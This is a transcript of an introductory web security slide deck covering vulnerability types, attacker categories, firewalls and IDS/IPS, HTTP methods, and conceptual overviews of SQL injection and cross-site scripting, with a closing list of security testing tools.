1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.

Slides:



Advertisements
Similar presentations
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Advertisements

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners David Shelly Randy Marchany Joseph Tront Virginia Polytechnic Institute.
WebGoat & WebScarab “What is computer security for $1000 Alex?”
Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
Chapter 10: Data Centre and Network Security Proxies and Gateways * Firewalls * Virtual Private Network (VPN) * Security issues * * * * Objectives:
INDEX  Ethical Hacking Terminology.  What is Ethical hacking?  Who are Ethical hacker?  How many types of hackers?  White Hats (Ethical hackers)
Security+ Guide to Network Security Fundamentals
System and Network Security Practices COEN 351 E-Commerce Security.
Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Security Overview. 2 Objectives Understand network security Understand security threat trends and their ramifications Understand the goals of network.
Application Layer  We will learn about protocols by examining popular application-level protocols  HTTP  FTP  SMTP / POP3 / IMAP  Focus on client-server.
Hacking Web Server Defiana Arnaldy, M.Si
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
JavaScript, Fourth Edition
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Software Security Testing Vinay Srinivasan cell:
OSI and TCP/IP Models And Some Vulnerabilities AfNOG th May 2011 – 10 th June 2011 Tanzania By Marcus K. G. Adomey.
CHAPTER 11 Spoofing Attack. INTRODUCTION Definition Spoofing is the act of using one machine in the network communication to impersonate another. The.
1 CHAPTER 3 CLASSES OF ATTACK. 2 Denial of Service (DoS) Takes place when availability to resource is intentionally blocked or degraded Takes place when.
Security+ Guide to Network Security Fundamentals, Fourth Edition
Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
Web Applications Testing By Jamie Rougvie Supported by.
By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.
BY SYDNEY FERNANDES T.E COMP ROLL NO: INTRODUCTION Networks are used as a medium inorder to exchange data packets between the server and clients.
Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected.
COSC 2328 – Web Programming.  PHP is a server scripting language  It’s widely-used and free  It’s an alternative to Microsoft’s ASP and Ruby  PHP.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
1 Chapter 22 World Wide Web (HTTP) Chapter 22 World Wide Web (HTTP) Mi-Jung Choi Dept. of Computer Science and Engineering
Kali Linux BY BLAZE STERLING. Roadmap  What is Kali Linux  Installing Kali Linux  Included Tools  In depth included tools  Conclusion.
Penetration Testing By Blaze Sterling. Roadmap What is Penetration Testing How is it done? Penetration Testing Tools Kali Linux In depth included tools.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
Unit 2 Personal Cyber Security and Social Engineering Part 2.
Powerpoint presentation on Drive-by download attack -By Yogita Goyal.
Firewalls. Overview of Firewalls As the name implies, a firewall acts to provide secured access between two networks A firewall may be implemented as.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Google’s Gruyere1 : An XSS Example Presented by: Terry Gregory
Group 18: Chris Hood Brett Poche
Web Application Vulnerabilities
CSCE 548 Student Presentation By Manasa Suthram
TMG Client Protection 6NPS – Session 7.
Working at a Small-to-Medium Business or ISP – Chapter 8
Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
CISC103 Web Development Basics: Web site:
Secure Software Confidentiality Integrity Data Security Authentication
MIT GSL 2018 week 1 | day 4 Introduction to Web Development II.
CISC103 Web Development Basics: Web site:
Defense in Depth Web Server Custom HTTP Handler Input Validation
CSC 495/583 Topics of Software Security Intro to Web Security
Lecture 2 - SQL Injection
Web Servers / Deployment
Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
Security: Exploits & Countermeasures
Designing IIS Security (IIS – Internet Information Service)
Presentation transcript:

1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks 8-Packages 9- References

Is the degree of weakness which allows the attackers to gain access to system information Vulnerabities types: Technological TCP/IP Protocol(ARP, Session hijacking) OS Weakness Network equipment(routers/firewalls). Configuration Unsecured user accounts Easily user passwords Unsecured defaults settings for an application Misconfigured network devices Security policy Lack of written policy Software/Hardware installation and changes don’t follow the policy No Disaster recovery plain Software bugs

Black hats Individuals with computing skills Malicious / Destructive activities Known as Crackers White hats Individuals with hacking skills Defensive purposes Known as Security Analysts Gray hats Individuals who works Offensive and defensive Script kidy A user with no knowledge of hacking. Download hacking utilities to launch attakcs. Hacktivist Hacker with political motivations.

Passive attacks No traffic sent from attacker Difficult to detect Like packet capturing (Wireshark, Snooping ) Active attacks Traffic must be sent from attacker Easily to detect Can access classified information Modify data on a system

Reconnaissance Gain information about targeted victim hosts/networks Scanning Identifying active hosts/open ports Gaining access Logging in to the host/network Maintaining access Install a backdoor/root kit Covering tracks Trying to hide the attack from the administrator

No single access control ever implemented Multiple layers of access control provides a security in depth No single point of failure Firewalls Block unwanted traffic Direct incoming traffic to more trust internal hosts Log traffic from/to internal(Private) network Based on access policy which (Permit or Deny) Cryptography

IDS -Intrusion Detection System- Application layer firewall Host based/Network based Passive device Offline connectivity The detection based on signature DB.

IPS – Intrusion Prevention System - Application layer firewall Host based/Network based Active device Online connectivity

Store, process, and deliver HTML/JAVA Scripts pages to a client using Hypertext Transfer Protocol. This page may contains Text, Images, Scripts, Style sheets Web client/Web agent is a web browser, or a web crawler In 1989 by Tim Berners-Lee as a project to exchange information World’s first web server called CERN httpd Ran on NeXTSTEP Workstation.

HTTP Protocol based on HTTP request methods: GET: Request data from a resource Data pairs sent In the URL Can be cached Remains in browser history Can be bookmarked should never used when exchange sensitive data have length restrictions Should be used only to retrieve data POST: Submit data to be processed. Data pairs sent in the HTTP message body Never cached Do not remain in the browser history Cannot be bookmarked Have no restrictions There are also Head, Put, Delete, Options, Connect, but out of presentation scope Cookies are used to store data between pages in the client, and session files in the servers

SQL Injection Cross-Site scripting XSS

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. - Retrieve Data - Destroy Data - Change Data

1-SQL : Try to load a Course with ID SQL : Try with ID SQL: Combine with other tables: 4-SQL: To retrieve the DB name:

How to inject a JavaScript into HTML page either by GET or PORT method. XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

Types of Cross Site Scripting Non-Persistent Persistent

In case of Non-Persistent attack, it requires a user to visit the specially crafted link by the attacker. When the user visit the link, the crafted code will get executed by the user’s browser.

In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non-persistent attack. Here we will see how to hijack other user’s session by performing XSS

1-burpsuite_free_v1.5 2-SQL MAP 3-Nikto 4-Nessus 5-GoogleDorks 6-WebCrowler (HTTPTrack, Wget) 7-WebScarab (HTTP traffic interception)

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.